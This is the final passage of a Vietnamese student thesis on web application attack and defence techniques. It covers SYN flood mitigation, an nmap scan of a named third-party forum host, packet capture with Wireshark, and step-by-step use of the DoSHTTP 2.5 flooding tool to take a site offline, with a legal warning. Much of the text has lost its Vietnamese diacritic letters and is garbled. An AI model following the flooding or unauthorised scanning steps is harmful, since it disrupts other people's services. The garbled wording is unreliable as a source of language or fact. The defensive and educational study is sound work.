Kiu tn cng t chi dch v l kiu tn cng gy nhiu kh khn trong vn bo v cng nh iu tra tm ra th phm nht, bi v hu ht hacker thay i a chIP ca my mnh nn rt kh xc nh ai l th phm. phng chng kh nng khuych i ng truyn, cn:- Hu kh nng broadcast ti router bin- Tng kch thc hng i kt niTa c th phng trnh kh nng trn hng i qua nhiu kt ni, nhng cch ny sdng nhiu ti nguyn:- Gim thi gian thit lp kt ni- Dng nhng phn mm pht hin v ph hy kiu tn cng DoS:Hu ht nhng h iu hnh hin nay u h tr kh nng pht hin v phng chng

kiu tn cng lt SYN.Tuy nhin cng c nhng phn mm c c kh nng trnh kiu tn cng

ny.V d nh vi Linux kernels 2.0.30 v v sau ci t mt ty chn gi l SYN Cookie ,kernel c nhim v truy tm v lu vt nhng kh nng c th xy ra k thut SYN. Sau, kernel s s dng mt giao thc m ho nh SYN cookie cho php ngi dng hpl ca h thng tip tc kt ni n h thng Vi WindowNT 4.0 tr v sau, s dng k

SV :Nguyn Vn i 45


46/55


thut backlog, mi khi hng i kt ni khng p ng, h thng t ng cung cpti nguyn cho hng i, v th hngi s khng b ph v.

ng dng ch cho php mi mt my con chc thit lp s kt ni ti a theoqui nh trnh trng hp hacker gi cng lc nhiu yu cu gy tc nghn.

CHNG 3 GII THIU MT S CNG C PH

DNG TRONG K THUT TN CNG V BO MT

NG DNG WEB

SV :Nguyn Vn i 46


47/55


3.1. Tool scanning

Trong k thut tn cng cng nh bo mt ng dng web th thao tc u tin

thng l thao tc kim tra li h thng nhm xc nh li ca h thng . Cc cng c

d tm li(tool scanning) h tr c lc cho cng vic ny , cc hacker c th dngchng d tm li v sau c th dung framework hay code c sn trn mt s ti

liu hay internet m tn cng ng dng web. Nhng n cng l cng c hu ch cc

nh qun tr mng , cc nh qun tr h thng ng dng web nhs gi li mc bo

mt ca h thng ng dng web t c nhng phng pht bo mt hay v li tng

ng .

Trong n ny ti s gii thiu mt tool scanning m ngun m rt thng

dng l nmap. Nmap mt cng c rt d s dng bn c th s dng dng lnh trn

mi trng dos hay c th s dng cc ty chn trc tip trn chnh giao din ca

nmap .

Hnh 1 giao din ca nmap

SV :Nguyn Vn i 47


48/55


Giao din thn thin vi ngi dung nn nmap rt d s dng. Di y v d

minh ha ng dng web. y l host forum.congthuongit.net. Thc hin in:

Target: forum.congthuongit.net. profile:Intense sacan . Chng ta thu c

nhng kt qu

Hnh 2 m t kiu qut intense ca nmap

Hnh 3 kt qu khi dng nmap phn (nmap out)

SV :Nguyn Vn i 48


49/55


Hnh 4 Kt qu trn nmap out (tip)

y l hnh nh giao thc ca h thng ng dng web

SV :Nguyn Vn i 49


50/55


Hnh 5 hnh nh ca host ang kim tra

Mc d c rt nhiu chc nng nhng c nhng lc nmap cng khng xc nhc chnh xc cc thng s ca i tng. Nh trong trng hp trn Nmap khng

xc nh c thng tin v phn mm ca host(no Os matches for host). Khi bn s

dng namap qut mt host no th sau c th sy ra tnh trng khng truy cp

vo trang web ny na bn ng lo lng vi pht sau bn s truy cp c.

2. Cng c bt gi tin

Dng cng c bt gi tin l mt cch ph bin nghe ln cc gi tin trn mng.Trong n ny ti s gii thiu cng c wireshare. Mt cng c m ngun m giao

din ha thn thin d s dng.

SV :Nguyn Vn i 50


51/55


Hnh 6 giao din ca wireshare

Bn click vo mc interface list chn card mng v chn start

Ta c giao din sau(hnh 7).

Phn mu vng l nhng gi tin ang c truyn ti bn. Phn bn did l nhngthng tin ca gi tin c m ha di dng hexa.

SV :Nguyn Vn i 51


52/55


Hnh 7 giao din ca wireshare khi bt gi tin

Khi bn nhp vo phng m hexa hoc cc dng thng tin bn s thu c thngtin ca gi tin c m ha. Nhu hinh di

Hnh 8 Thng tin ca nhng gi tin m wireshare bt c

SV :Nguyn Vn i 52


53/55


Bn c th save nhng thng tin ny ra v s dng n sau.Cng vic tip theo

ca bn l tm thm phn mm dich nhng m ha ra v c thng tin ca nhng

gi tin .

3 Cng c dng tn cng dos ng dng webNh trnh by chng 2 phng php tn cng d l mt phng php

kinh in kh phng trnh. y ti s gii thiu vi cc bn cgn c DoSHTTP 2.5

mt cng c rt ph dng trong vic tn cng dos ng dng web mt cng c m cc

Hacker hay dng. Giao din ca DoSHTTP 2.5(hnh 9).

Hnh 9 Giao din ca DoSHTTP 2.5

Thao tc vi cng c ny rt d dng, hacker ch cn nhp vo target URL a

ch con ddos. Chn s socket v nhn start flood. V sau ch vic ngi i ch

khong 5 pht sau host s khng truy cp c. Cnh bo vic tn cgn ng dng

web l tri php lut nn bn khng th ty tin s dng cng c ny.

SV :Nguyn Vn i 53


54/55


PHN KT LUN V HNG PHTTRIN CA N

ng dng web pht trin vi tc chng mt v v vy k thut tn cng v

bo mt ng dng web cng pht trin vi trnh cao. Tn cng v bo mt ng dng

web l mt ti rt rng i hi s am hiu v phi c k thut chuyn mn cao. Do

thi gian lm n ngn v k thut ca em cn c hn nn nhng phn em trnh by

n ny mi l nhng kin thc c bn v cn nhiu hn ch . Nhng c s gip tn tnh ca ca cc thy trong khoa cng ngh thng tin nht l thy Hunh

Nguyn Thnh Lun v cng chnh v c nhn v lm n ny em hiu r hn

nhng khi nim chuyn mn lin quan n ng dng web m lu nay em nm cha

chc. Em cng hiu r hn v nhng k thut tn cng ng dng c bn l nn tng cho

nhng phng pht tn cng hin i ng thi em cng bit c mt s phng

php phng trnh tn cng v bo mt ng dng web.

Nhng kin thc ny s gip ch rt nhiu cho em sau ny. Nhng kin thc nys gip em c nn tng vng chc hn v k thut chuyn mn lin quan n k thut

bo mt ng dng web. Sau khi thc hin xong n ny em s s dng nhng kin

thc tm hiu v c gng hc thm, tm hiu thm nhng kin thc chuyn mn lin

quan nhm xy dng m cng c hay mt phuong php bo mt ng dng web hiu

qu trc cc cuc tn cng.

SV :Nguyn Vn i 54


55/55


Ti liu tham kho

Trong n ny em tham kho rt nhiu bi vit ca cc tc gi , nht l trn

internet sau y l thng tin ti liu.

Lun vn tt nghip Nghin cu mt s vn bo mt ng dng web trn internet

ca Nguyn Duy Thng v Nguyn minh Th.

ETHICAL HACKING 1-5 by EC-Council

http://vietbao.vn/Vi-tinh-Vien-thong/Tim-hieu-ve-cac-ung-dung

Web/65082882/229/

http://iht.vn/mang-bao-mat/505-tim-hieu-ve-cac-ung-dung-web.html

http://www.onboom.com/kien-thuc-ve-web/quang-ba-website/1598-kien-truc-net-

trong-mo-hinh-ung-dung-thuong-mai-dien-tu.html

http://www.vnsolutions.net/cms/vi/chi-tiet/ung-dung-web-(webapp)-la-gi/30

http://vovanhai.wordpress.com/web/jsp/mo-hinh-mvc-va-1-vi-d%E1%BB%A5-

%E1%BB%A9ng-d%E1%BB%A5ng/

http://web.dongtak.net/spip.php?article125

http://www.truongchieu.0fees.net/diendan/130/PHP/Thuat-ngu.html

http://Cht xu v bo mt trang web cho ngi khng chuyn.htm

http://CCH HACK WEBSITE - YuMe_vn.htm

http://Cch tn cng h thng Cisco(Trang 1) - H thng mng CISCO - Din n

trung tm Zonotek - Powered by Discuz! Archiver.htm

http://thuynt' Blog - Nhng l hng bo mt thng gp trn website.htm

The end
http://www.truongchieu.0fees.net/diendan/130/PHP/Thuat-ngu.htmlhttp://www.truongchieu.0fees.net/diendan/130/PHP/Thuat-ngu.html

Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744

Documents

Transcript of Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744